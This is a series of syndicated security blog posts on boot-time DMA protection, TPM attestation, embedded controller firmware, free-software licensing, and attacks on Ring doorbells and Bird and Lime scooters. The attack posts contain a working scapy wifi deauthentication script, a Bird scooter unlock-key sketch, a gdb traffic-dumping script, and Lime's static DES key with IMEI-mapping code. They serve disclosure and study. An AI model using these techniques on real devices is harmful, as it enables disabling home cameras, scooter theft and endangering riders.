But setting things up in the OS isn’t sufficient. If an attacker is able to trigger arbitrary DMA before the OS has started then they can tamper with the system firmware or your bootloader and modify the kernel before it even starts running. So ideally you want your firmware to set up the IOMMU before it even enables any external devices, and newer firmware should actually do this automatically. It sounds like the problem is solved.

Except there’s a problem. Not all operating systems know how to program the IOMMU, and if a naive OS fails to remove the IOMMU mappings and asks a device to DMA to an address that the IOMMU doesn’t grant access to then things are likely to explode messily. EFI has an explicit transition between the boot environment and the runtime environment triggered when the OS or bootloader calls ExitBootServices(). Various EFI components have registered callbacks that are triggered at this point, and the IOMMU driver will (in general) then tear down the IOMMU mappings before passing control to the OS. If the OS is IOMMU aware it’ll then program new mappings, but there’s a brief window where the IOMMU protection is missing – and a sufficiently malicious device could take advantage of that.

The ideal solution would be a protocol that allowed the OS to indicate to the firmware that it supported this functionality and request that the firmware not remove it, but in the absence of such a protocol we’re left with non-ideal solutions. One is to prevent devices from being able to DMA in the first place, which means the absence of any IOMMU restrictions is largely irrelevant. Every PCI device has a busmaster bit – if the busmaster bit is disabled, the device shouldn’t start any DMA transactions. Clearing that seems like a straightforward approach. Unfortunately this bit is under the control of the device itself, so a malicious device can just ignore this and do DMA anyway. Fortunately, PCI bridges and PCIe root ports should only forward DMA transactions if their busmaster bit is set. If we clear that then any devices downstream of the bridge or port shouldn’t be able to DMA, no matter how malicious they are. Linux will only re-enable the bit after it’s done IOMMU setup, so we should then be in a much more secure state – we still need to trust that our motherboard chipset isn’t malicious, but we don’t need to trust individual third party PCI devices.
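
You can inspect the busmaster bit on a running system yourself – it’s bit 2 of the 16-bit command register at offset 4 of PCI configuration space, which Linux exposes through sysfs:

    def bus_master_enabled(bdf):
        # The command register is a little-endian 16-bit value at offset 4 of
        # config space; bit 2 is Bus Master Enable.
        with open(f"/sys/bus/pci/devices/{bdf}/config", "rb") as f:
            f.seek(4)
            command = int.from_bytes(f.read(2), "little")
        return bool(command & 0x4)

    # The address here is just an example - pick a bridge or root port from lspci
    print(bus_master_enabled("0000:00:1c.0"))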

This patch just got merged, adding support for this. My original version did nothing other than clear the bits on bridge devices, but this did have the potential for breaking devices that were still carrying out DMA at the moment this code ran. Ard modified it to call the driver shutdown code for each device behind a bridge before disabling DMA on the bridge, which in theory makes this safe but does still depend on the firmware drivers behaving correctly. As a result it’s not enabled by default – you can either turn it on in kernel config or pass the efi=disable_early_pci_dma kernel command line argument.

In combination with firmware that does the right thing, this should ensure that Linux systems can be protected against malicious PCI devices throughout the entire boot process.

Verifying your system state in a secure and private way

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54203.html

Most modern PCs have a Trusted Platform Module (TPM) and firmware that, together, support something called Trusted Boot. In Trusted Boot, each component in the boot chain generates a series of measurements of the next component of the boot process and relevant configuration. These measurements are pushed to the TPM where they’re combined with the existing values stored in a series of Platform Configuration Registers (PCRs) in such a way that the final PCR value depends on both the value and the order of the measurements it’s given. If any measurements change, the final PCR value changes.

Windows takes advantage of this with its Bitlocker disk encryption technology. The disk encryption key is stored in the TPM along with a policy that tells it to release it only if a specific set of PCR values is correct. By default, the TPM will release the encryption key automatically if the PCR values match and the system will just transparently boot. If someone tampers with the boot process or configuration, the PCR values will no longer match and boot will halt to allow the user to provide the disk key in some other way.

Unfortunately the TPM keeps no record of how it got to a specific state. If the PCR values don’t match, that’s all we know – the TPM is unable to tell us what changed to result in this breakage. Fortunately, the system firmware maintains an event log as we go along. Each measurement that’s pushed to the TPM is accompanied by a new entry in the event log, containing not only the hash that was pushed to the TPM but also metadata that tells us what was measured and why. Since the algorithm the TPM uses to calculate the hash values is known, we can replay the same values from the event log and verify that we end up with the same final value that’s in the TPM. We can then examine the event log to see what changed.
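
The replay itself is simple, because a PCR extend is just “hash the current PCR value concatenated with the new measurement”. Recomputing the expected final value from a list of event digests (SHA-256 bank, digests as raw bytes) looks like this:

    import hashlib

    def replay_pcr(event_digests, hash_name="sha256"):
        # PCRs 0-15 start at all zeroes; each extend sets
        # PCR = H(PCR || measurement), so both the values and their order matter.
        size = hashlib.new(hash_name).digest_size
        pcr = b"\x00" * size
        for digest in event_digests:
            pcr = hashlib.new(hash_name, pcr + digest).digest()
        return pcr.hex()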

Unfortunately, the event log is stored in unprotected system RAM. In order to be able to trust it we need to compare the values in the event log (which can be tampered with) with the values in the TPM (which are much harder to tamper with). Unfortunately if someone has tampered with the event log then they could also have tampered with the bits of the OS that are doing that comparison. Put simply, if the machine is in a potentially untrustworthy state, we can’t trust that machine to tell us anything about itself.

This is solved using a procedure called Remote Attestation. The TPM can be asked to provide a digital signature of the PCR values, and this can be passed to a remote system along with the event log. That remote system can then examine the event log, make sure it corresponds to the signed PCR values and make a security decision based on the contents of the event log rather than just on the final PCR values. This makes the system significantly more flexible and aids diagnostics. Unfortunately, it also means you need a remote server and an internet connection and then some way for that remote server to tell you whether it thinks your system is trustworthy and also you need some way to believe that the remote server is trustworthy and all of this is well not ideal if you’re not an enterprise.

Last week I gave a talk at linux.conf.au on one way around this. Basically, remote attestation places no constraints on the network protocol in use – while the implementations that exist all do this over IP, there’s no requirement for them to do so. So I wrote an implementation that runs over Bluetooth, in theory allowing you to use your phone to serve as the remote agent. If you trust your phone, you can use it as a tool for determining if you should trust your laptop.

I’ve pushed some code that demos this. The current implementation does nothing other than tell you whether UEFI Secure Boot was enabled or not, and it’s also not currently running on a phone. The phone bit of this is pretty straightforward to fix, but the rest is somewhat harder.

The big issue we face is that we frequently don’t know what event log values we should be seeing. The first few values are produced by the system firmware and there’s no standardised way to publish the expected values. The Linux Vendor Firmware Service has support for publishing these values, so for some systems we can get hold of this. But then you get to measurements of your bootloader and kernel, and those change every time you do an update. Ideally we’d have tooling for Linux distributions to publish known good values for each package version and for that to be common across distributions. This would allow tools to download metadata and verify that measurements correspond to legitimate builds from the distribution in question.

This does still leave the problem of the initramfs. Since initramfs files are usually generated locally, and depend on the locally installed versions of tools at the point they’re built, we end up with no good way to precalculate those values. I proposed a possible solution to this a while back, but have done absolutely nothing to help make that happen. I suck. The right way to do this may actually just be to turn initramfs images into pre-built artifacts and figure out the config at runtime (dracut actually supports a bunch of this already), so I’m going to spend a while playing with that.

If we can pull these pieces together then we can get to a place where you can boot your laptop and then, before typing any authentication details, have your phone compare each component in the boot process to expected values. Assistance in all of this extremely gratefully received.

Wifi deauthentication attacks and home security

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53968.html

I live in a large apartment complex (it’s literally a city block big), so I spend a disproportionate amount of time walking down corridors. Recently one of my neighbours installed a Ring wireless doorbell. By default these are motion activated (and the process for disabling motion detection is far from obvious), and if the owner subscribes to an appropriate plan these recordings are stored in the cloud. I’m not super enthusiastic about the idea of having my conversations recorded while I’m walking past someone’s door, so I decided to look into the security of these devices.

One visit to Amazon later and I had a refurbished Ring Video Doorbell 2™ sitting on my desk. Tearing it down revealed it uses a TI SoC that’s optimised for this sort of application, linked to a DSP that presumably does stuff like motion detection. The device spends most of its time in a sleep state where it generates no network activity, so on any wakeup it has to reassociate with the wireless network and start streaming data.

So we have a device that’s silent and undetectable until it starts recording you, which isn’t a great place to start from. But fortunately wifi has a few, uh, interesting design choices that mean we can still do something. The first is that even on an encrypted network, the packet headers are unencrypted and contain the address of the access point and whichever device is communicating. This means that it’s possible to just dump whatever traffic is floating past and build up a collection of device addresses. Address ranges are allocated by the IEEE, so it’s possible to map the addresses you see to manufacturers and get some idea of what’s actually on the network[1] even if you can’t see what they’re actually transmitting. The second is that various management frames aren’t encrypted, and so can be faked even if you don’t have the network credentials.

The most interesting one here is the deauthentication frame that access points can use to tell clients that they’re no longer welcome. These can be sent for a variety of reasons, including resource exhaustion or authentication failure. And, by default, they’re entirely unprotected. Anyone can inject such a frame into your network and cause clients to believe they’re no longer authorised to use the network, at which point they’ll have to go through a new authentication cycle – and while they’re doing that, they’re not able to send any other packets.

So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target – and that means a target can potentially shoot off a notification while you’re looking at other frequencies.

But even with that proviso, this seems to work reasonably reliably. I can hit the button on my Ring, see it show up in my hacked up code and see my phone receive no push notification. Even if it does get a notification, the doorbell is no longer accessible by the time I respond.
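
For reference, the core of the approach – watch for frames from addresses in the range you care about and immediately spoof deauthentication frames from the access point – is only a few lines of scapy. The interface needs to be in monitor mode on the right channel, the OUI prefix is a placeholder, and the channel hopping is omitted:

    from scapy.all import RadioTap, Dot11, Dot11Deauth, sniff, sendp

    TARGET_OUI = "xx:xx:xx"    # placeholder for the address range of interest
    IFACE = "wlan0mon"         # monitor-mode interface tuned to the AP's channel

    def maybe_deauth(pkt):
        if not pkt.haslayer(Dot11):
            return
        dot11 = pkt[Dot11]
        if dot11.type != 2:    # only look at data frames the client transmits
            return
        client, ap = dot11.addr2, dot11.addr1
        if client and client.lower().startswith(TARGET_OUI):
            # Spoof a deauthentication (management) frame that appears to come from the AP
            frame = (RadioTap() /
                     Dot11(type=0, subtype=12, addr1=client, addr2=ap, addr3=ap) /
                     Dot11Deauth(reason=7))
            sendp(frame, iface=IFACE, count=8, inter=0.05, verbose=False)

    # Only do this to devices on a network you own
    sniff(iface=IFACE, prn=maybe_deauth, store=False)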

There’s a couple of ways to avoid this attack. The first is to use 802.11w which protects management frames. A lot of hardware supports this, but it’s generally disabled by default. The second is to just ignore deauthentication frames in the first place, which is a spec violation but also you’re already building a device that exists to record strangers engaging in a range of legal activities so paying attention to social norms is clearly not a priority in any case.

Finally, none of this is even slightly new. A presentation from Def Con in 2016 covered this, demonstrating that Nest cameras could be blocked in the same way. The industry doesn’t seem to have learned from this.

[1] The Ring Video Doorbell 2 just uses addresses from TI’s range rather than anything Ring specific, unfortunately

Extending proprietary PC embedded controller firmware

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53703.html

I’m still playing with my X210, a device that just keeps coming up with new ways to teach me things. I’m now running Coreboot full time, so the majority of the runtime platform firmware is free software. Unfortunately, the firmware that’s running on the embedded controller (a separate chip that’s awake even when the rest of the system is asleep and which handles stuff like fan control, battery charging, transitioning into different power states and so on) is proprietary and the manufacturer of the chip won’t release data sheets for it. This was disappointing, because the stock EC firmware is kind of annoying (there’s no hysteresis on the fan control, so it hits a threshold, speeds up, drops below the threshold, turns off, and repeats every few seconds – also, a bunch of the Thinkpad hotkeys don’t do anything) and it would be nice to be able to improve it.

A few months ago someone posted a bunch of fixes, a Ghidra project and a kernel patch that lets you overwrite the EC’s code at runtime for purposes of experimentation. This seemed promising. Some amount of playing later and I’d produced a patch that generated keyboard scancodes for all the missing hotkeys, and I could then use udev to map those scancodes to the keycodes that the thinkpad_acpi driver would generate. I finally had a hotkey to tell me how much battery I had left.

But something else included in that post was a list of the GPIO mappings on the EC. A whole bunch of hardware on the board is connected to the EC in ways that allow it to control them, including things like disabling the backlight or switching the wifi card to airplane mode. Unfortunately the ACPI spec doesn’t cover how to control GPIO lines attached to the embedded controller – the only real way we have to communicate is via a set of registers that the EC firmware interprets and does stuff with.

One of those registers in the vendor firmware for the X210 looked promising, with individual bits that looked like radio control. Unfortunately writing to them does nothing – the EC firmware simply stashes that write in an address and returns it on read without parsing the bits in any way. Doing anything more with them was going to involve modifying the embedded controller code.

Thankfully the EC has 64K of firmware and is only using about 40K of that, so there’s plenty of room to add new code. The problem was generating the code in the first place and then getting it called. The EC is based on the CR16C architecture, which binutils supported until 10 days ago. To be fair it didn’t appear to actually work, and binutils still has support for the more generic version of the CR16 family, so I built a cross assembler, wrote some assembly and came up with something that Ghidra was willing to parse except for one thing.

As mentioned previously, the existing firmware code responded to writes to this register by saving it to its RAM. My plan was to stick my new code in unused space at the end of the firmware, including code that duplicated the firmware’s existing functionality. I could then replace the existing code that stored the register value with code that branched to my code, did whatever I wanted and then branched back to the original code. I hacked together some assembly that did the right thing in the most brute force way possible, but while Ghidra was happy with most of the code it wasn’t happy with the instruction that branched from the original code to the new code, or the instruction at the end that returned to the original code. The branch instruction differs from a jump instruction in that it gives a relative offset rather than an absolute address, which means that branching to nearby code can be encoded in fewer bytes than going further. I was specifying the longest jump encoding possible in my assembly (that’s what the :l means), but the linker was rewriting that to a shorter one. Ghidra was interpreting the shorter branch as a negative offset, and it wasn’t clear to me whether this was a binutils bug or a Ghidra bug. I ended up just hacking that code out of binutils so it generated code that Ghidra was happy with and got on with life.

Writing values directly to that EC register showed that it worked, which meant I could add an ACPI device that exposed the functionality to the OS. My goal here is to produce a standard Coreboot radio control device that other Coreboot platforms can implement, and then just write a single driver that exposes it. I wrote one for Linux that seems to work.

In summary: closed-source code is more annoying to improve, but that doesn’t mean it’s impossible. Also, strange Russians on forums make everything easier.

Letting Birds scooters fly free

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53258.html

(Note: These issues were disclosed to Bird, and they tell me that fixes have rolled out. I haven’t independently verified)

Bird produce a range of rental scooters that are available in multiple markets. With the exception of the Bird Zero[1], all their scooters share a common control board described in FCC filings. The board contains three primary components – a Nordic NRF52 Bluetooth controller, an STM32 SoC and a Quectel EC21-V modem. The Bluetooth and modem are both attached to the STM32 over serial and have no direct control over the rest of the scooter. The STM32 is tied to the scooter’s engine control unit and lights, and also receives input from the throttle (and, on some scooters, the brakes).

The pads labeled TP7-TP11 near the underside of the STM32 and the pads labeled TP1-TP5 near the underside of the NRF52 provide Serial Wire Debug, although confusingly the data and clock pins are the opposite way around between the STM and the NRF. Hooking this up via an STLink and using OpenOCD allows dumping of the firmware from both chips, which is where the fun begins. Running strings over the firmware from the STM32 revealed “Set mode to Free Drive Mode”. Challenge accepted.

Working back from the code that printed that, it was clear that commands could be delivered to the STM from the Bluetooth controller. The Nordic NRF52 parts are an interesting design – like the STM, they have an ARM Cortex-M microcontroller core. Their firmware is split into two halves, one the low level Bluetooth code and the other application code. They provide an SDK for writing the application code, and working through Ghidra made it clear that the majority of the application firmware on this chip was just SDK code. That made it easier to find the actual functionality, which was just listening for writes to a specific BLE attribute and then hitting a switch statement depending on what was sent. Most of these commands just got passed over the wire to the STM, so it seemed simple enough to just send the “Free drive mode” command to the Bluetooth controller, have it pass that on to the STM and win. Obviously, though, things weren’t so easy.

It turned out that passing most of the interesting commands on to the STM was conditional on a variable being set, and the code path that hit that variable had some impressively complicated looking code. Fortunately, I got lucky – the code referenced a bunch of data, and searching for some of the values in that data revealed that they were the AES S-box values. Enabling the full set of commands required you to send an encrypted command to the scooter, which would then decrypt it and verify that the cleartext contained a specific value. Implementing this would be straightforward as long as I knew the key.

Most AES keys are 128 bits, or 16 bytes. Digging through the code revealed 8 bytes worth of key fairly quickly, but the other 8 bytes were less obvious. I finally figured out that 4 more bytes were the value of another Bluetooth variable which could be simply read out by a client. The final 4 bytes were more confusing, because all the evidence made no sense. It looked like it came from passing the scooter serial number to atoi(), which converts an ASCII representation of a number to an integer. But this seemed wrong, because atoi() stops at the first non-numeric value and the scooter serial numbers all started with a letter[2]. It turned out that I was overthinking it and for the vast majority of scooters in the fleet, this section of the key was always “0”.
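
Pulling that together, the client side of the unlock flow looks roughly like the sketch below. The byte values are deliberately placeholders rather than the real ones, and the way the serial-derived integer is packed and the cipher mode used for the command are assumptions made for illustration:

    import re
    from Crypto.Cipher import AES    # pycryptodome

    def build_key(firmware_half, ble_value, serial):
        # 8 bytes hardcoded in the firmware, 4 bytes read from a BLE attribute,
        # and 4 bytes from atoi(serial) - which is 0 for serials that start
        # with a letter.
        digits = re.match(r"\d+", serial)
        serial_int = int(digits.group()) if digits else 0
        return firmware_half + ble_value + serial_int.to_bytes(4, "little")

    FIRMWARE_HALF = b"\x00" * 8    # placeholder, not the real bytes
    BLE_VALUE = b"\x00" * 4        # placeholder, read from the readable attribute

    key = build_key(FIRMWARE_HALF, BLE_VALUE, "AB1234567")

    # The scooter decrypts the command and checks for a specific value in the
    # cleartext; the payload and ECB mode here are stand-ins.
    command = AES.new(key, AES.MODE_ECB).encrypt(b"PLACEHOLDER-CMD!")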

At that point I had everything I needed to write a simple app to unlock the scooters, and it worked! For about 2 minutes, at which point the network would notice that the scooter was unlocked when it should be locked and send a lock command to forcibly disable the scooter again. Ah well.

So, what else could I do? The next thing I tried was just modifying some STM firmware and flashing it onto a board. It still booted, indicating that there was no sort of verified boot process. Remember what I mentioned about the throttle being hooked through the STM32’s analogue to digital converters[3]? A bit of hacking later and I had a board that would appear to work normally, but about a minute after starting the ride would cut the throttle. Alternative options are left as an exercise for the reader.

Finally, there was the component I hadn’t really looked at yet. The Quectel modem actually contains its own application processor that runs Linux, making it significantly more powerful than any of the chips actually running the scooter application[4]. The STM communicates with the modem over serial, sending it an AT command asking it to make an SSL connection to a remote endpoint. It then uses further AT commands to send data over this SSL connection, allowing it to talk to the internet without having any sort of IP stack. Figuring out just what was going over this connection was made slightly difficult by virtue of all the debug functionality having been ripped out of the STM’s firmware, so in the end I took a more brute force approach – I identified the address of the function that sends data to the modem, hooked up OpenOCD to the SWD pins on the STM, ran OpenOCD’s gdb stub, attached gdb, set a breakpoint for that function and then dumped the arguments being passed to that function. A couple of minutes later and I had a full transaction between the scooter and the remote.
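
The gdb side of that is scriptable too. A rough version, with the function address as a placeholder and assuming the usual ARM EABI convention of the first two arguments arriving in r0 and r1:

    # Run inside gdb (e.g. via "source dump_args.py") once attached to
    # OpenOCD's gdb stub with "target extended-remote :3333"
    import gdb

    class DumpModemWrites(gdb.Breakpoint):
        def stop(self):
            frame = gdb.selected_frame()
            buf = int(frame.read_register("r0"))      # pointer to the data
            length = int(frame.read_register("r1"))   # number of bytes
            data = gdb.selected_inferior().read_memory(buf, length)
            print(bytes(data))
            return False    # log and keep running rather than halting

    DumpModemWrites("*0x08001234")    # placeholder address of the send function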

The scooter authenticates against the remote endpoint by sending its serial number and IMEI. You need to send both, but the IMEI didn’t seem to need to be associated with the serial number at all. New connections seemed to take precedence over existing connections, so it would be simple to just pretend to be every scooter and hijack all the connections, resulting in scooter unlock commands being sent to you rather than to the scooter or allowing someone to send fake GPS data and make it impossible for users to find scooters.

In summary: Secrets that are stored on hardware that attackers can run arbitrary code on probably aren’t secret, not having verified boot on safety critical components isn’t ideal, devices should have meaningful cryptographic identity when authenticating against a remote endpoint.

Bird responded quickly to my reports, accepted my 90 day disclosure period and didn’t threaten to sue me at any point in the process, so good work Bird.

(Hey scooter companies I will absolutely accept gifts of interesting hardware in return for a cursory security audit)

[1] And some very early M365 scooters
[2] The M365 scooters that Bird originally deployed did have numeric serial numbers, but they were 6 characters of type code followed by a / followed by the actual serial number – the number of type codes was very constrained and atoi() would terminate at the / so this was still not a large keyspace
[3] Interestingly, Lime made a different design choice here and plumb the controls directly through to the engine control unit without the application processor having any involvement
[4] Lime run their entire software stack on the modem’s application processor, but because of [3] they don’t have any realtime requirements so this is more straightforward

Investigating the security of Lime scooters

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53024.html

(Note: to be clear, this vulnerability does not exist in the current version of the software on these scooters. Also, this is not the topic of my Kawaiicon talk.)

I’ve been looking at the security of the Lime escooters. These caught my attention because:
(1) There’s a whole bunch of them outside my building, and
(2) I can see them via Bluetooth from my sofa
which, given that I’m extremely lazy, made them more attractive targets than something that would actually require me to leave my home. I did some digging. Limes run Linux and have a single running app that’s responsible for scooter management. They have an internal debug port that exposes USB and which, until this happened, ran adb (as root!) over that connection. As a result, there’s a fair amount of information available in various places, which made it easier to start figuring out how they work.

The obvious attack surface is Bluetooth (Limes have wifi, but only appear to use it to upload lists of nearby wifi networks, presumably for geolocation if they can’t get a GPS fix). Each Lime broadcasts its name as Lime-12345678 where 12345678 is 8 digits of hex. They implement Bluetooth Low Energy and expose a custom service with various attributes. One of these attributes (0x35 on at least some of them) sends Bluetooth traffic to the application processor, which then parses it. This is where things get a little more interesting. The app has a core event loop that can take commands from multiple sources and then makes a decision about which component to dispatch them to. Each command is of the following form:

AT+type,password,time,sequence,data$

where type is one of either ATH, QRY, CMD or DBG. The password is a TOTP derived from the IMEI of the scooter, the time is simply the current date and time of day, the sequence is a monotonically increasing counter and the data is a blob of JSON. The command is terminated with a $ sign. The code is fairly agnostic about where the command came from, which means that you can send the same commands over Bluetooth as you can over the cellular network that the Limes are connected to. Since locking and unlocking is triggered by one of these commands being sent over the network, it ought to be possible to do the same by pushing a command over Bluetooth.

Unfortunately for nefarious individuals, all commands sent over Bluetooth are ignored until an authentication step is performed. The code I looked at had two ways of performing authentication – you could send an authentication token that was derived from the scooter’s IMEI and the current time and some other stuff, or you could send a token that was just an HMAC of the IMEI and a static secret. Doing the latter was more appealing, both because it’s simpler and because doing so flipped the scooter into manufacturing mode at which point all other command validation was also disabled (bye bye having to generate a TOTP). But how do we get the IMEI? There’s actually two approaches:

1) Read it off the sticker that’s on the side of the scooter (obvious, uninteresting)
2) Take advantage of how the scooter’s Bluetooth name is generated

Remember the 8 digits of hex I mentioned earlier? They’re generated by taking the IMEI, encrypting it using DES and a static key (0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88), discarding the first 4 bytes of the output and turning the last 4 bytes into 8 digits of hex. Since we’re discarding information, there’s no way to immediately reverse the process – but IMEIs for a given manufacturer are all allocated from the same range, so we can just take the entire possible IMEI space for the modem chipset Lime use, encrypt all of them and end up with a mapping of name to IMEI (it turns out this doesn’t guarantee that the mapping is unique – for around 0.01%, the same name maps to two different IMEIs). So we now have enough information to generate an authentication token that we can send over Bluetooth, which disables all further authentication and enables us to send further commands to disconnect the scooter from the network (so we can’t be tracked) and then unlock and enable the scooter.
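
A sketch of that precomputation is below. Exactly how the 15-digit IMEI gets packed into a single 8-byte DES block is glossed over – pack_imei() is a stand-in – but the overall shape of the mapping is the interesting bit:

    from Crypto.Cipher import DES    # pycryptodome

    STATIC_KEY = bytes([0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88])

    def pack_imei(imei: str) -> bytes:
        # Stand-in for however the IMEI actually gets turned into a DES block
        return int(imei).to_bytes(8, "big")

    def ble_name(imei: str) -> str:
        block = DES.new(STATIC_KEY, DES.MODE_ECB).encrypt(pack_imei(imei))
        # Discard the first 4 bytes and hex-encode the remaining 4
        return "Lime-" + block[4:].hex()

    def build_mapping(imei_prefix: str, count: int) -> dict:
        # Walk a chunk of the IMEI space and invert the name derivation.
        # A small fraction of names (~0.01%) map to more than one IMEI.
        table = {}
        width = 15 - len(imei_prefix)
        for i in range(count):
            imei = f"{imei_prefix}{i:0{width}d}"
            table.setdefault(ble_name(imei), []).append(imei)
        return table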

(Note: these are actual crimes)

This all seemed very exciting, but then a shock twist occurred – earlier this year, Lime updated their authentication method and now there’s actual asymmetric cryptography involved and you’d need to engage in rather more actual crimes to obtain the key material necessary to authenticate over Bluetooth, and all of this research becomes much less interesting other than as an example of how other companies probably shouldn’t do it.

In any case, congratulations to Lime on actually implementing security!

Do we need to rethink what free software is?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52907.html

Licensing has always been a fundamental tool in achieving free software’s goals, with copyleft licenses deliberately taking advantage of copyright to ensure that all further recipients of software are in a position to exercise free software’s four essential freedoms. Recently we’ve seen people raising two very different concerns around existing licenses and proposing new types of license as remedies, and while both are (at present) incompatible with our existing concepts of what free software is, they both raise genuine issues that the community should seriously consider.

The first is the rise in licenses that attempt to restrict business models based around providing software as a service. If users can pay Amazon to provide a hosted version of a piece of software, there’s little incentive for them to pay the authors of that software. This has led to various projects adopting license terms such as the Commons Clause that effectively make it nonviable to provide such a service, forcing providers to pay for a commercial use license instead.

In general the entities pushing for these licenses are VC backed companies[1] who are themselves benefiting from free software written by volunteers that they give nothing back to, so I have very little sympathy. But it does raise a larger issue – how do we ensure that production of free software isn’t just a mechanism for the transformation of unpaid labour into corporate profit? I’m fortunate enough to be paid to write free software, but many projects of immense infrastructural importance are simultaneously fundamental to multiple business models and also chronically underfunded. In an era where people are becoming increasingly vocal about wealth and power disparity, this obvious unfairness will result in people attempting to find mechanisms to impose some degree of balance – and given the degree to which copyleft licenses prevented certain abuses of the commons, it’s likely that people will attempt to do so using licenses.

At the same time, people are spending more time considering some of the other ethical outcomes of free software. Copyleft ensures that you can share your code with your neighbour without your neighbour being able to deny the same freedom to others, but it does nothing to prevent your neighbour using your code to deny other fundamental, non-software, freedoms. As governments make more and more use of technology to perform acts of mass surveillance, detention, and even genocide, software authors may feel legitimately appalled at the idea that they are helping enable this by allowing their software to be used for any purpose. The JSON license includes a requirement that “The Software shall be used for Good, not Evil”, but the lack of any meaningful clarity around what “Good” and “Evil” actually mean makes it hard to determine whether it achieved its aims.

The definition of free software includes the assertion that it must be possible to use the software for any purpose. But if it is possible to use software in such a way that others lose their freedom to exercise those rights, is this really the standard we should be holding? Again, it’s unsurprising that people will attempt to solve this problem through licensing, even if in doing so they no longer meet the current definition of free software.

I don’t have solutions for these problems, and I don’t know for sure that it’s possible to solve them without causing more harm than good in the process. But in the absence of these issues being discussed within the free software community, we risk free software being splintered – on one side, with companies imposing increasingly draconian licensing terms in an attempt to prop up their business models, and on the other side, with people deciding that protecting people’s freedom to life, liberty and the pursuit of happiness is more important than protecting their freedom to use software to deny those freedoms to others.

As stewards of the free software definition, the Free Software Foundation should be taking the lead in ensuring that these issues are discussed. The priority of the board right now should be to restructure itself to ensure that it can legitimately claim to represent the community and play the leadership role it’s been failing to in recent years, otherwise the opportunity will be lost and much of the activist energy that underpins free software will be spent elsewhere.

If free software is going to maintain relevance, it needs to continue to explain how it interacts with contemporary social issues. If any organisation is going to claim to lead the community, it needs to be doing that.

[1] Plus one VC firm itself – Bain Capital, an investment firm notorious for investing in companies, extracting as much value as possible and then allowing the companies to go bankrupt
